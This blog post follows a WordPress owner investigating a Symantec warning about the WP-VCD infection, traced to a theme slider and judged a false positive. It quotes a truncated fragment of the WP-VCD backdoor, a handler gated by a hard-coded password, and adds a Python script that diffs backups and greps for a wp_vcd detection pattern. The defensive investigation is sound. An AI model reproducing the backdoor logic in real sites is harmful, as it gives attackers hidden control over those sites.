Here is what I got when I visited my WordPress website, www.51sec.org. It looks very interesting, and I am wondering what has been detected.
Based on the warning message and SID, I was able to find the following details on the Symantec (Broadcom) website:
===========================================================================
Description
Additional Information
engine results on behalf of attackers) and insertion of malvertising code that creates potentially dangerous redirects and pop-up ads for users viewing a compromised site.
Affected
- WordPress websites
===========================================================================
I kept digging into this WP-VCD infection, thinking my site was probably infected. Here is what I found for WP-VCD.
===========================================================================
```php
<?php
// Truncated WP-VCD snippet as quoted on the page: a hard-coded password in the request
// gates an 'action' handler, which is why "wp_vcd" is the string scanners look for.
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '2f3ad13e4908141130e292bf8aa67474')) {
    $div_code_name = "wp_vcd";
    switch ($_REQUEST['action']) {
        case 'change_domain';
            if (isset($_REQUEST['newdomain']))
```
===========================================================================
Before starting to compare the backup files with the current files to find where this WP-VCD code was injected, I thought I would try some other steps first.
Looking at Symantec Endpoint Protection, I could not see any details that would help.
The interesting thing is that this warning only shows on the homepage, not on the other pages of the website. That is the first thing I noticed. If a theme or plugin were infected, shouldn't all pages get this warning?
1. Online vulnerability scan and security checking
I could not find any other online scanning tool that raised a similar warning.
2. Upgrade themes and plugins
All themes and plugins have been upgraded to the latest version.
3. Deactivate plugins
I checked all related plugins and deactivated them one by one to see if that helped, but found nothing.
4. Focus on the interesting things you found
Eventually I thought about what is different between the homepage and the other pages. The only section that shows on the first page is the Slider settings.
I decided to turn off the Slider settings on all pages, as shown in the following screenshot, and that annoying warning message was gone.
5. Installed the MalCare plugin to scan the whole site and found nothing on my site.
This is quite decent and useful software for site security: it copies some of the database tables and all site files to its cloud server for scanning. The WP-VCD signature is definitely in its database, so if there were anything related to WP-VCD, MalCare would find it.
6. My last resort would be comparing files from a backup.
That would take quite a while to figure out. I am glad I was able to find out that it is the slider causing this. It might relate to the slider code from the Startup Blog theme by Compete Themes.
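As an added example (not the original post's code), here is how the backup-versus-live comparison from step 6 could be scripted in Python: it hashes both trees, lists what was added or changed, and greps those PHP files for the wp_vcd marker seen in the snippet above. The demo theme, paths and file contents are constructed for the example.

```python
"""Diff a WordPress backup tree against the live tree, then grep the added or
modified PHP files for the WP-VCD marker quoted on this page. Every path
and file body below is constructed for the example."""
import hashlib
import re
import tempfile
from pathlib import Path

# The "wp_vcd" name, or a hard-coded 32-hex password comparison like the one in
# the quoted snippet, marks the injected code.
WP_VCD_MARKER = re.compile(
    r"wp_vcd|\$_REQUEST\s*\[\s*['\"]password['\"]\s*\]\s*==\s*['\"][0-9a-f]{32}['\"]")

def hash_tree(root):
    """Map each file path (relative to root, POSIX form) to its SHA-256 hex digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def diff_trees(backup_root, live_root):
    """Return sorted (added, modified) paths of the live tree relative to the backup."""
    backup, live = hash_tree(backup_root), hash_tree(live_root)
    added = sorted(p for p in live if p not in backup)
    modified = sorted(p for p in live if p in backup and live[p] != backup[p])
    return added, modified

def scan_for_wp_vcd(live_root, rel_paths):
    """Return the PHP files among rel_paths whose text contains the marker."""
    return [rel for rel in rel_paths if rel.endswith(".php")
            and WP_VCD_MARKER.search(Path(live_root, rel).read_text(errors="ignore"))]

def demo():
    """Build a constructed backup/live pair, diff them and scan the changed files."""
    base = Path(tempfile.mkdtemp())
    clean = "<?php\n// constructed clean theme file\nfunction demo_init() {}\n"
    injected = '<?php $div_code_name = "wp_vcd"; /* constructed WP-VCD-style prefix */\n'
    trees = {"backup": {"functions.php": clean},
             "live": {"functions.php": injected + clean, "extra.php": clean}}
    for tree, contents in trees.items():
        theme_dir = base / tree / "wp-content" / "themes" / "demo"
        theme_dir.mkdir(parents=True)
        for name, body in contents.items():
            (theme_dir / name).write_text(body)
    added, modified = diff_trees(base / "backup", base / "live")
    return added, modified, scan_for_wp_vcd(base / "live", added + modified)

if __name__ == "__main__":
    print(demo())
```

On a real site you would point diff_trees at the extracted backup and the live document root, and review every hit (and every added PHP file) by hand before deleting anything.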
To sum up, based on my troubleshooting this morning, this is just a false positive from the Symantec Endpoint Protection software. Symantec's security business was bought by Broadcom a while ago, and the future of the Symantec products is not clear. I might need to think about changing to other security software.
Note: this message only appears in the Chrome browser, not in Edge. It has been reported to the Symantec submission site: https://symsubmit.symantec.com/
References
- Responding to suspected IPS false positives in Endpoint Protection
- Submit suspicious files to Symantec Security Response
- Symantec Submission Site